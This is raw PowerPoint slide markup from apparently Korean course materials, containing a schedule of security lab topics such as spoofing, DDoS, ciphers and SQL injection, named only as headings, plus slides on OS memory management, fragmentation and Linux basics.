                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>) ~ 23.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>스니핑</a:t>
                      </a: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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>스푸핑</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네트워크위협</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>스니핑</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>스푸핑</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t> 공격 및 방어 실습</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>- APR, IP Spoofing</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네트워크위협</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DDOS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>공격 및 방어 실습</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>SYN Flooding, Slowloris </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>공격</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>석가탄신일</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="700" kern="0" spc="-60">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(5.19(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="700" kern="0" spc="-60">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>수</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공격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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>대칭키</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="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암호 실습</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err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>시저</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>비즈네르</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>rsa</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암호 실습</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블록암호</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(CBC &amp; ECB) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="800" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>모드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웹 공격 및 대응</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방화벽 실습</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웹 구조 및 취약점</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웹 공격 및 대응</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SQL injection </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="8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파일 다운로드 취약점 공격 및 대응</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실습</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a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>[6.7(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>월</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>) ~ 11.(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>금</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="900" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="HY중고딕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="HY중고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Memory Management</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연속 할당 방식</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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메모리 관리</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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err="1"/>
              <a:t>비연속</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" b="1"/>
              <a:t> 할당 방식</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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고정 분할 방식</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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가변 분할 방식</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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a:t>First Fit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="130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a:t>Best Fit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="130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a:t>Worst Fit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="130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a:t>프로세스 크기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300"/>
              <a:t>이상인 것 중</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="130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a:t>프로세스 크기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300"/>
              <a:t>이상인 것 중</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="130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a:t>프로세스 크기</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1300"/>
              <a:t>이상인 것 중</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1300"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="130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a:t>Paging</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="160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a:t>Segmentation</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1600" b="1"/>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a:t>메모리를 분할하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="160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a:t>메모리를 분할하여</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="160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Memory Management</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>외부 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>단편화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>남은 메모리가 연속적이지 않아서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>필요 메모리 보다 많은 공간이 남아 있지만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>메모리에 올리지 못하는 공간 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>116K + 96K + 6K + 56K = 274K </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>Partition</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>Main Memory</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US"/>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Memory Management</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214K </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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메모리</a:t>
            </a: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아깝다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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>, 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>할당하시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>연결</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Time Units Remaining </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" kern="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" b="1" kern="0" spc="20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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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47955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1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>외부 단편화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>해결할 수 있는 방법은 없을까</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>운영체제 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>프로그래머가 하드웨어를 몰라도 쉽게 하드웨어 자원을 활용할 수 있게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>하는것</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>효율적으로 하드웨어를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용하는것</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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Linux shell</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a:t>Window Shell</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>Linux Shell  - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bash</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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a:t>현재 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">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/Theory/T15 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> Linux… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>왜 쓸까</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>?</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>OS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1800" b="1" i="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>시장 전망</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>리눅스의 장점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" b="1"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600" err="1"/>
              <a:t>이식성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>확장성 좋음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>( c, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>기계어 구성</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>풍부한 소프트웨어 개발 환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>오픈소스 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t> 버그 패치 활발</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>완성도가 높음</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>보안성 우수</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>가벼움</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1600"/>
              <a:t>무료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1600"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="160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a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Linux File System =&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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/Theory/T16 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
